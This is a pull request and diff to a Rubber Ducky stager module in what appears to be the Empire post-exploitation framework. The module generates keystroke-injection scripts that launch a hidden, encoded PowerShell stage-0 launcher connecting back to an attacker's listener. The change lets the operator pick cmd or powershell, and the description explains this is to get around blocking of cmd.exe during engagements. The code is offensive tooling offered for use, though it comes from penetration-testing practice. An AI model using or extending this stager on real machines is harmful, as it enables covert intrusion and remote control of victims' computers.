### PR TITLE
Modified the ducky stager to use custom interpreter

### DIFF
--- a/lib/stagers/windows/ducky.py
+++ b/lib/stagers/windows/ducky.py
@@ -7,7 +7,7 @@ class Stager:
         self.info = {
             'Name': 'DuckyLauncher',
 
-            'Author': ['@harmj0y'],
+            'Author': ['@harmj0y','@kisasondi'],
 
             'Description': ('Generates a ducky script that runes a one-liner stage0 launcher for Empire.'),
 
@@ -30,6 +30,11 @@ class Stager:
                 'Required'      :   True,
                 'Value'         :   'powershell'
             },
+            'Interpreter' : {
+                'Description'   :   'Which interpreter do you want? (powershell or cmd)',
+                'Required'      :   False,
+                'Value'         :   'powershell'
+            },
             'StagerRetries' : {
                 'Description'   :   'Times for the stager to retry connecting.',
                 'Required'      :   False,
@@ -39,7 +44,7 @@ class Stager:
                 'Description'   :   'File to output duckyscript to, otherwise displayed on the screen.',
                 'Required'      :   False,
                 'Value'         :   ''
-            },       
+            },
             'UserAgent' : {
                 'Description'   :   'User-agent string to use for the staging request (default, none, or other).',
                 'Required'      :   False,
@@ -72,6 +77,7 @@ class Stager:
 
         # extract all of our options
         language = self.options['Language']['Value']
+        interpreter = self.options['Interpreter']['Value']
         listenerName = self.options['Listener']['Value']
         userAgent = self.options['UserAgent']['Value']
         proxy = self.options['Proxy']['Value']
@@ -80,8 +86,8 @@ class Stager:
 
         # generate the launcher code
         launcher = self.mainMenu.stagers.generate_launcher(listenerName, language=language, encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds, stagerRetries=stagerRetries)
-        
-        if launcher == "":
+
+        if launcher == "" or interpreter == "":
             print helpers.color("[!] Error in launcher command generation.")
             return ""
         else:
@@ -90,7 +96,7 @@ class Stager:
             duckyCode =  "DELAY 3000\n"
             duckyCode += "GUI r\n"
             duckyCode += "DELAY 1000\n"
-            duckyCode += "STRING cmd\n"
+            duckyCode += "STRING "+ interpreter + "\n"
             duckyCode += "ENTER\n"
             duckyCode += "DELAY 2000\n"
             duckyCode += "STRING powershell -W Hidden -nop -noni -enc "+enc+" \n"


### PR DESCRIPTION
On my last engagement, cmd.exe was blocked everywhere, but powershell.exe wasn't. 

I just added an option to choose the interpreter you want to use (defaulted to powershell), this should be more effective in the field. Instead of hardcoding, i just added an option (defaulting to powershell) that can change that parameter.